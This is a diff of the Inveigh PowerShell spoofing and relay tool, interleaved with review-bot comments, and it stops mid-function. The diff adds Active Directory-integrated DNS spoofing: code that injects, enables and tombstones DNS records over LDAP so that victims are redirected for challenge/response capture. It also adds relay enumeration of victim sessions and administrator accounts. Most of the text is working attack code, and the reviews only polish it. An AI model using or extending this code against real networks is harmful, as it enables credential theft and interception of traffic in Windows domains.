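Review bot: The new `.PARAMETER ADIPartition` entry does not match the parameter it documents; the param block later in this diff declares `$ADIDNSPartition` with `ValidateSet("DomainDNSZones","ForestDNSZones")`, so Get-Help will show an orphaned entry, and the value `ForestDNSZone` in the text is missing its trailing `s`. Change the header to `.PARAMETER ADIDNSPartition` and the text to `Default = DomainDNSZones: (DomainDNSZones/ForestDNSZones) The AD partition name where the zone is stored.`. `seperated` in the ADIDNSHostsIgnore entry should be `separated`.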
@@ -37,16 +59,8 @@ displaying full capture lists when running through a shell that does not have ac
Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname,
and username combinations when real time console output is enabled.
-.PARAMETER DNS
-Default = Disabled: (Y/N) Enable/Disable injecting DNS host (A) records using dynamic updates.
-
-.PARAMETER DNSThreshold
-Default = 5: The threshold used to determine when DNS records are injected. Inveigh will track identical LLMNR and
-NBNS requests received from multiple systems. DNS records will be injected once the system count for identical LLMNR
-and NBNS requests reaches the threshold.
-
-.PARAMETER DNSTTL
-Default = 3600 Seconds: DNS TTL in seconds for A records.
+.PARAMETER ADIDNSTTL
+Default = 600 Seconds: DNS TTL in seconds for added A records.
.PARAMETER ElevatedPrivilege
Default = Auto: (Auto/Y/N) Set the privilege mode. Auto will determine if Inveigh is running with
@@ -217,7 +231,7 @@ Default = All: Comma separated list of requested hostnames to ignore when spoofi
Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR/mDNS/NBNS.
.PARAMETER SpooferIP
-IP address for LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
+IP address for ADIDNS/LLMNR/mDNS/NBNS spoofing. This parameter is only necessary when redirecting victims to a system
other than the Inveigh host.
.PARAMETER SpooferIPsIgnore
@@ -324,11 +338,13 @@ Execute specifying an HTTP redirect response.
https://github.com/Kevin-Robertson/Inveigh
#>
+#region begin parameters
+
# Parameter default values can be modified in this section:
[CmdletBinding()]
param
(
- [parameter(Mandatory=$false)][Array]$DNSHostsIgnore = ("isatap","wpad"),
+ [parameter(Mandatory=$false)][Array]$ADIDNSHostsIgnore = ("isatap","wpad"),
[parameter(Mandatory=$false)][Array]$HTTPResetDelay = "Firefox",
[parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
@@ -339,8 +355,8 @@ param
[parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "Firefox",
[parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1",
[parameter(Mandatory=$false)][Int]$ConsoleStatus = "",
- [parameter(Mandatory=$false)][Int]$DNSThreshold = "5",
- [parameter(Mandatory=$false)][Int]$DNSTTL = "3600",
+ [parameter(Mandatory=$false)][Int]$ADIDNSThreshold = "4",
+ [parameter(Mandatory=$false)][Int]$ADIDNSTTL = "600",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
[parameter(Mandatory=$false)][Int]$HTTPResetDelayTimeout = "30",
@@ -354,6 +370,9 @@ param
[parameter(Mandatory=$false)][Int]$WPADPort = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "",
[parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30",
+ [parameter(Mandatory=$false)][String]$ADIDNSDomain = "",
+ [parameter(Mandatory=$false)][String]$ADIDNSDomainController = "",
+ [parameter(Mandatory=$false)][String]$ADIDNSZone = "",
[parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS",
[parameter(Mandatory=$false)][String]$HTTPContentType = "text/html",
[parameter(Mandatory=$false)][String]$HTTPDefaultFile = "",
@@ -365,7 +384,8 @@ param
[parameter(Mandatory=$false)][String]$WPADResponse = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y",
- [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$DNS = "N",
+ [parameter(Mandatory=$false)][ValidateSet("Combo","Wildcard")][String]$ADIDNS,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$ADIDNSPartition = "DomainDNSZones",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Evade = "Y",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
[parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y",
@@ -398,16 +418,20 @@ param
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
[parameter(Mandatory=$false)][Switch]$Inspect,
+ [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ADIDNSIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "",
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$ADIDNSCredential,
[parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
)
-if ($invalid_parameter)
+#endregion
+#region begin initialization
+if($invalid_parameter)
{
Write-Output "[-] $($invalid_parameter) is not a valid parameter"
throw
@@ -417,7 +441,17 @@ $inveigh_version = "1.4 Dev"
if(!$IP)
{
- $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+
+ try
+ {
+ $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address)
+ }
+ catch
+ {
+ Write-Output "[-] Error finding local IP, specify manually with -IP"
+ throw
+ }
+
}
if(!$SpooferIP)
@@ -425,6 +459,46 @@ if(!$SpooferIP)
$SpooferIP = $IP
}
+if($ADIDNS)
+{
+
+ if($ADIDNS -and !$ADIDNSIP)
+ {
+ $ADIDNSIP = $SpooferIP
+ }
+
+ if(!$ADIDNSDomainController -or !$ADIDNSDomain -or !$ADIDNSZone)
+ {
+
+ try
+ {
+ $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+ }
+ catch
+ {
+ Write-Output "[-] $($_.Exception.Message)"
+ throw
+ }
+
+ if(!$ADIDNSDomainController)
+ {
+ $ADIDNSDomainController = $current_domain.PdcRoleOwner.Name
+ }
+
+ if(!$ADIDNSDomain)
+ {
+ $ADIDNSDomain = $current_domain.Name
+ }
+
+ if(!$ADIDNSZone)
+ {
+ $ADIDNSZone = $current_domain.Name
+ }
+
+ }
+
+}
+
if($HTTPDefaultFile -or $HTTPDefaultEXE)
{
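Review bot: Inside `if($ADIDNS)` the nested test `if($ADIDNS -and !$ADIDNSIP)` repeats a condition already known to be true; `if(!$ADIDNSIP)` is enough. The help text earlier in this diff says ADIDNSDomain is required when ADIDNSDomainController is an IP address, but nothing here enforces it: on a non-domain host the code falls through to `GetCurrentDomain()` and the user sees the raw exception text instead of which parameter is missing, and that lookup runs under the current logon rather than `$ADIDNSCredential`. An explicit check before the try — if `[System.Net.IPAddress]::TryParse` accepts `$ADIDNSDomainController` and `$ADIDNSDomain` is empty, `Write-Output "[-] ADIDNSDomain is required when ADIDNSDomainController is an IP address"` and throw — would make the failure actionable; `$ADIDNSZone` falls back the same way and likely deserves the same treatment.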
@@ -481,19 +555,20 @@ if(!$inveigh)
$inveigh.POST_request_list = New-Object System.Collections.ArrayList
$inveigh.relay_user_failed_list = New-Object System.Collections.ArrayList
$inveigh.valid_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_list = New-Object System.Collections.ArrayList
- $inveigh.requested_host_IP_list = New-Object System.Collections.ArrayList
- $inveigh.DNS_list = New-Object System.Collections.ArrayList
+ $inveigh.DNS_table = [HashTable]::Synchronized(@{})
$inveigh.relay_privilege_table = [HashTable]::Synchronized(@{})
$inveigh.relay_failed_auth_table = [HashTable]::Synchronized(@{})
$inveigh.relay_history_table = [HashTable]::Synchronized(@{})
+ $inveigh.request_table = [HashTable]::Synchronized(@{})
$inveigh.session_socket_table = [HashTable]::Synchronized(@{})
$inveigh.session_table = [HashTable]::Synchronized(@{})
$inveigh.session_message_ID_table = [HashTable]::Synchronized(@{})
$inveigh.session_lock_table = [HashTable]::Synchronized(@{})
+ $inveigh.SMB_session_table = [HashTable]::Synchronized(@{})
+ $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{})
$inveigh.session_count = 0
$inveigh.session_list = @()
- $inveigh.enumeration_list = @()
+ $inveigh.enumeration_data = @()
}
if($inveigh.running)
@@ -502,11 +577,7 @@ if($inveigh.running)
throw
}
-if($HTTP_listener.IsListening -and !$inveigh.relay_running)
-{
- $HTTP_listener.Stop()
- $HTTP_listener.Close()
-}
+$inveigh.stop = $false
if(!$inveigh.relay_running)
{
@@ -600,13 +671,6 @@ if(!$elevated_privilege)
$SMB = "N"
}
-if($DNS -eq 'Y' -and !(Get-Command Invoke-DNSupdate -errorAction SilentlyContinue))
-{
- Write-Output "[-] DNS requires Invoke-DNSUpdate"
- throw
- $DNS = "N"
-}
-
$inveigh.hostname_spoof = $false
$inveigh.running = $true
@@ -693,13 +757,33 @@ else
$inveigh.newline = ""
}
+$inveigh.netBIOS_domain = (Get-ChildItem -path env:userdomain).Value
+$inveigh.computer_name = (Get-ChildItem -path env:computername).Value
+
+try
+{
+ $inveigh.DNS_domain = ((Get-ChildItem -path env:userdnsdomain).Value).ToLower()
+ $inveigh.DNS_computer_name = ($inveigh.computer_name + "." + $inveigh.DNS_domain).ToLower()
+
+ if(!$inveigh.domain_mapping_table.($inveigh.netBIOS_domain))
+ {
+ $inveigh.domain_mapping_table.Add($inveigh.netBIOS_domain,$inveigh.DNS_domain)
+ }
+
+}
+catch
+{
+ $inveigh.DNS_domain = $inveigh.netBIOS_domain
+ $inveigh.DNS_computer_name = $inveigh.computer_name
+}
+
if($inveigh.relay_running)
{
$inveigh.output_pause = $true
}
-# Write startup messages
-
+#endregion
+#region begin startup messages
$inveigh.output_queue.Add("[*] Inveigh $inveigh_version started at $(Get-Date -format s)") > $null
if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege)
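Review bot: `(Get-ChildItem -path env:userdnsdomain).Value` relies on provider behaviour to signal "not domain-joined": when the variable is absent Get-ChildItem reports a path-not-found error and, as far as I can tell, it is the `.ToLower()` on the resulting null that raises the terminating error the `catch` sees, so an error line may be written to the console before the fallback runs. `$env:USERDNSDOMAIN` is simply `$null` when unset, so an explicit `if($env:USERDNSDOMAIN)` around the two assignments, with the current catch body as the `else`, states the intent directly. The `netBIOS_domain` and `computer_name` lines above the `try` use the same pattern with no protection at all; `$env:USERDOMAIN` and `$env:COMPUTERNAME` would avoid a stray error there too.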
@@ -741,7 +825,7 @@ if($LLMNR -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] LLMNR Spoofer = Disabled") > $null
- $LLMNR_response_message = "[LLMNR spoofer is disabled]"
+ $LLMNR_response_message = "[Spoofer Disabled]"
}
if($mDNS -eq 'Y')
@@ -772,7 +856,7 @@ if($mDNS -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] mDNS Spoofer = Disabled") > $null
- $mDNS_response_message = "[mDNS spoofer is disabled]"
+ $mDNS_response_message = "[Spoofer Disabled]"
}
if($NBNS -eq 'Y')
@@ -792,7 +876,7 @@ if($NBNS -eq 'Y')
else
{
$inveigh.output_queue.Add("[+] NBNS Spoofer = Disabled") > $null
- $NBNS_response_message = "[NBNS spoofer is disabled]"
+ $NBNS_response_message = "[Spoofer Disabled]"
}
if($NBNSBruteForce -eq 'Y')
@@ -871,15 +955,25 @@ else
$inveigh.spoofer_repeat = $true
}
-if($DNS -eq 'Y')
+if($ADIDNS)
{
- $inveigh.DNS = $true
- $inveigh.output_queue.Add("[+] DNS Injection = Enabled") > $null
- $inveigh.output_queue.Add("[+] DNS Hosts Ignore = " + ($DNSHostsIgnore -join ",")) > $null
+ $inveigh.ADIDNS = $ADIDNS
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer = $ADIDNS") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer IP = $ADIDNSIP") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Hosts Ignore = " + ($ADIDNSHostsIgnore -join ",")) > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Domain Controller = $ADIDNSDomainController") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Domain = $ADIDNSDomain") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Zone = $ADIDNSZone") > $null
+
+ if($ADIDNS -eq 'Combo')
+ {
+ $inveigh.request_table_updated = $true
+ }
+
}
else
{
- $inveigh.output_queue.Add("[+] DNS Injection = Disabled") > $null
+ $inveigh.output_queue.Add("[+] ADIDNS Spoofer = Disabled") > $null
}
if($SMB -eq 'Y' -and $elevated_privilege)
@@ -964,7 +1058,7 @@ if($HTTPS -eq 'Y')
$certificate.InitializeFromPrivateKey(2,$certificate_key,"")
$certificate.Subject = $certificate_distinguished_name
$certificate.Issuer = $certificate_issuer_distinguished_name
- $certificate.NotBefore = (get-date).AddDays(-271)
+ $certificate.NotBefore = (Get-Date).AddDays(-271)
$certificate.NotAfter = $certificate.NotBefore.AddDays(824)
$certificate_hash_algorithm_OID = New-Object -ComObject X509Enrollment.CObjectId
$certificate_hash_algorithm_OID.InitializeFromAlgorithmName(1,0,0,"SHA256")
@@ -1349,56 +1443,55 @@ while($inveigh.output_queue.Count -gt 0)
}
-if($inveigh.relay_running)
-{
- $inveigh.output_pause = $false
-}
-
-# Begin ScriptBlocks
+#endregion
+#region begin script blocks
# Shared Basic Functions ScriptBlock
$shared_basic_functions_scriptblock =
{
- function DataToUInt16($field)
- {
- [Array]::Reverse($field)
- return [System.BitConverter]::ToUInt16($field,0)
- }
-
- function DataToUInt32($field)
+ function Get-UInt16DataLength
{
- [Array]::Reverse($field)
- return [System.BitConverter]::ToUInt32($field,0)
- }
+ param ([Int]$Start,[Byte[]]$Data)
- function DataLength2
- {
- param ([Int]$length_start,[Byte[]]$string_extract_data)
+ $data_length = [System.BitConverter]::ToUInt16($Data[$Start..($Start + 1)],0)
- $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
- return $string_length
+ return $data_length
}
- function DataLength4
+ function Get-UInt32DataLength
{
- param ([Int]$length_start,[Byte[]]$string_extract_data)
+ param ([Int]$Start,[Byte[]]$Data)
- $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
- return $string_length
+ $data_length = [System.BitConverter]::ToUInt32($Data[$Start..($Start + 3)],0)
+
+ return $data_length
}
- function DataToString
+ function Convert-DataToString
{
- param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+ param ([Int]$Start,[Int]$Length,[Byte[]]$Data)
- $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+ $string_data = [System.BitConverter]::ToString($Data[$Start..($Start + $Length - 1)])
$string_data = $string_data -replace "-00",""
$string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
$string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+
return $string_extract
}
+ function Convert-DataToUInt16($field)
+ {
+ [Array]::Reverse($field)
+ return [System.BitConverter]::ToUInt16($field,0)
+ }
+
+ function Convert-DataToUInt32($field)
+ {
+ [Array]::Reverse($field)
+ return [System.BitConverter]::ToUInt32($field,0)
+ }
+
function SpooferResponseMessage
{
param ([String]$query_string,[String]$mDNS_type)
@@ -1427,11 +1520,11 @@ $shared_basic_functions_scriptblock =
}
elseif($inveigh.IP_capture_list -contains $source_IP.IPAddressToString)
{
- $response_message = "[previous capture from $source_IP]"
+ $response_message = "[Previous $source_IP Capture]"
}
elseif($source_IP -eq $IP)
{
- $response_message = "[ignoring local request]"
+ $response_message = "[Local Request]"
}
elseif($SpooferLearningDelay -and $spoofer_learning_stopwatch.Elapsed -lt $spoofer_learning_delay)
{
@@ -1439,20 +1532,20 @@ $shared_basic_functions_scriptblock =
}
elseif($destination_IP.IPAddressToString -eq $IP)
{
- $response_message = "[ResponderGuard detected and ignored]"
+ $response_message = "[ResponderGuard Ignored]"
$response_type = "[!]"
}
elseif($NBNSTypes -notcontains $NBNS_query_type)
{
- $response_message = "[disabled NBNS type]"
+ $response_message = "[NBNS Type Disabled]"
}
elseif($query_string.Trim() -eq '*')
{
- $response_message = "[NBSTAT request]"
+ $response_message = "[NBSTAT Request]"
}
elseif($mDNS_type -and $mDNSTypes -notcontains $mDNS_type)
{
- $response_message = "[disabled mDNS type]"
+ $response_message = "[mDNS Type Disabled]"
}
else
{
@@ -1475,58 +1568,823 @@ $shared_basic_functions_scriptblock =
return $byte_array
}
-
+ function New-RelayEnumObject
+ {
+ param ($IP,$Hostname,$Sessions,$AdministratorUsers,$AdministratorGroups,$Privileged,$Shares,$NetSessions,$NetSessionsMapped,
+ $LocalUsers,$SMB2,$Signing,$SMBServer,$Targeted,$Enumerate,$Execute)
+
+ if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)}
+ if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)}
+ if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)}
+ if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)}
+ if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)}
+ if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)}
+ if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)}
+ if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)}
+
+ $relay_object = New-Object PSObject
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumeration_data.Count
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumeration
+ Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execution
+
+ return $relay_object
+ }
+
+ function Invoke-SessionUpdate
+ {
+ param ([String]$domain,[String]$username,[String]$hostname,[String]$IP)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+ $session = ($username + "@" + $inveigh.domain_mapping_table.$domain).ToUpper()
+ $hostname_full = ($hostname + "." + $inveigh.domain_mapping_table.$domain).ToUpper()
+ }
+ else
+ {
+ $session = $domain + "\" + $username
+ }
+
+ if($inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname_full})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.Hostname -eq $hostname_full} | Select-Object -expand Index
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain
+
+ if($session_entry -like "$domain\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ elseif($inveigh.enumeration_data | Where-Object {$_.IP -eq $IP})
+ {
+ $target_index = $inveigh.enumeration_data | Where-Object {$_.IP -eq $IP} | Select-Object -expand Index
+ $inveigh.enumeration_data[$target_index].Hostname = $hostname_full
+ $session_list = @($inveigh.enumeration_data[$target_index].Sessions)
+
+ if($inveigh.domain_mapping_table.$domain)
+ {
+
+ For($i = 0;$i -lt $session_list.Count;$i++)
+ {
+ $session_username = ($session_list[$i].Split("\"))[1]
+ $session_update = $session_username + "@" + $inveigh.domain_mapping_table.$domain
+
+ if($session_list[$i] -like "$domain\*")
+ {
+ $session_list[$i] = $session_update
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+
+ }
+
+ if($session_list -notcontains $session)
+ {
+ $session_list += $session
+ $inveigh.enumeration_data[$target_index].Sessions = $session_list
+ }
+
+ }
+ else
+ {
+ $inveigh.enumeration_data += New-RelayEnumObject -IP $IP -Hostname $hostname_full -Session $session
+ }
+
+ }
}
# DNS Functions ScriptBlock
-$DNS_functions_scriptblock =
+$ADIDNS_functions_scriptblock =
{
+
+ function Disable-ADIDNSNode
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $SOASerialNumberArray = New-SOASerialNumberArray -DomainController $DomainController -Zone $Zone
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ $timestamp = [Int64](([datetime]::UtcNow.Ticks)-(Get-Date "1/1/1601").Ticks)
+ $timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($timestamp))
+ $timestamp = $timestamp.Split("-") | ForEach-Object{[System.Convert]::ToInt16($_,16)}
+
+ [Byte[]]$DNS_record = 0x08,0x00,0x00,0x00,0x05,0x00,0x00,0x00 +
+ $SOASerialNumberArray[0..3] +
+ 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
+ $timestamp
+
+ try
+ {
+ $directory_entry.InvokeSet('dnsRecord',$DNS_record)
+ $directory_entry.InvokeSet('dnsTombstoned',$true)
+ $directory_entry.SetInfo()
+ $inveigh.output_queue.Add("[+] [$(Get-Date -format s)] ADIDNS node $Node tombstoned") > $null
+ }
+ catch
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ }
+
+ function Enable-ADIDNSNode
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][ValidateSet("A","AAAA","CNAME","DNAME","MX","NS","PTR","SRV","TXT")][String]$Type = "A",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][Byte[]]$DNSRecord,
+ [parameter(Mandatory=$false)][Int]$Preference,
+ [parameter(Mandatory=$false)][Int]$Priority,
+ [parameter(Mandatory=$false)][Int]$Weight,
+ [parameter(Mandatory=$false)][Int]$Port,
+ [parameter(Mandatory=$false)][Int]$TTL = 600,
+ [parameter(Mandatory=$false)][Int32]$SOASerialNumber,
+ [parameter(Mandatory=$false)][Switch]$Static,
+ [parameter(Mandatory=$false)][Switch]$Tombstone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ [Byte[]]$DNSRecord = New-DNSRecordArray -Data $Data -DomainController $DomainController -TTL $TTL -Zone $Zone
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ try
+ {
+ $directory_entry.InvokeSet('dnsRecord',$DNSRecord)
+ $directory_entry.SetInfo()
+ $success = $true
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] ADIDNS node $Node added") > $null;
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "1"
+ }
+
+ }
+ catch
+ {
+ $success = $false
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+
+ if($inveigh.ADIDNS -eq 'Combo')
+ {
+ $inveigh.DNS_table.$Node = "0"
+ }
+
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ return $success
+ }
+
+ function Get-ADIDNSNodeTombstoned
+ {
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Zone,
+ [parameter(Mandatory=$false)][System.Management.Automation.PSCredential]$Credential
+ )
+
+ $distinguished_name = "DC=$Node,DC=$Zone,CN=MicrosoftDNS,DC=$Partition"
+ $DC_array = $Domain.Split(".")
+
+ ForEach($DC in $DC_array)
+ {
+ $distinguished_name += ",DC=$DC"
+ }
+
+ if($Credential)
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$DomainController/$distinguished_name",$Credential.UserName,$Credential.GetNetworkCredential().Password)
+ }
+ else
+ {
+ $directory_entry = New-Object System.DirectoryServices.DirectoryEntry "LDAP://$DomainController/$distinguished_name"
+ }
+
+ try
+ {
+ $dnsTombstoned = $directory_entry.InvokeGet('dnsTombstoned')
+ $dnsRecord = $directory_entry.InvokeGet('dnsRecord')
+ }
+ catch
+ {
+
+ if($_.Exception.Message -notlike '*Exception calling "InvokeGet" with "1" argument(s): "The specified directory service attribute or value does not exist.*')
+ {
+ $error_message = $_.Exception.Message
+ $error_message = $error_message -replace "`n",""
+ $inveigh.output_queue.Add("[!] [$(Get-Date -format s)] $error_message") > $null
+ }
+
+ }
+
+ if($directory_entry.Path)
+ {
+ $directory_entry.Close()
+ }
+
+ $node_tombstoned = $false
+
+ if($dnsTombstoned -and $dnsRecord)
+ {
+
+ if($dnsRecord[0].GetType().name -eq [Byte])
+ {
+
+ if($dnsRecord.Count -ge 32 -and $dnsRecord[2] -eq 0)
+ {
+ $node_tombstoned = $true
+ }
+
+ }
+
+ }
+
+ return $node_tombstoned
+ }
- function DNSUpdate
+ function New-ADIDNSNode
{
- param ([String]$DNSName,[String]$DNSData,[Int]$DNSTTL)
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$Data,
+ [parameter(Mandatory=$false)][String]$DistinguishedName,
+ [parameter(Mandatory=$false)][String]$Domain,
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$true)][String]$Node,
+ [parameter(Mandatory=$false)][ValidateSet("DomainDNSZones","ForestDNSZones")][String]$Partition = "DomainDNSZones",
+ [parameter(Mandatory=$false)][String]$Type,
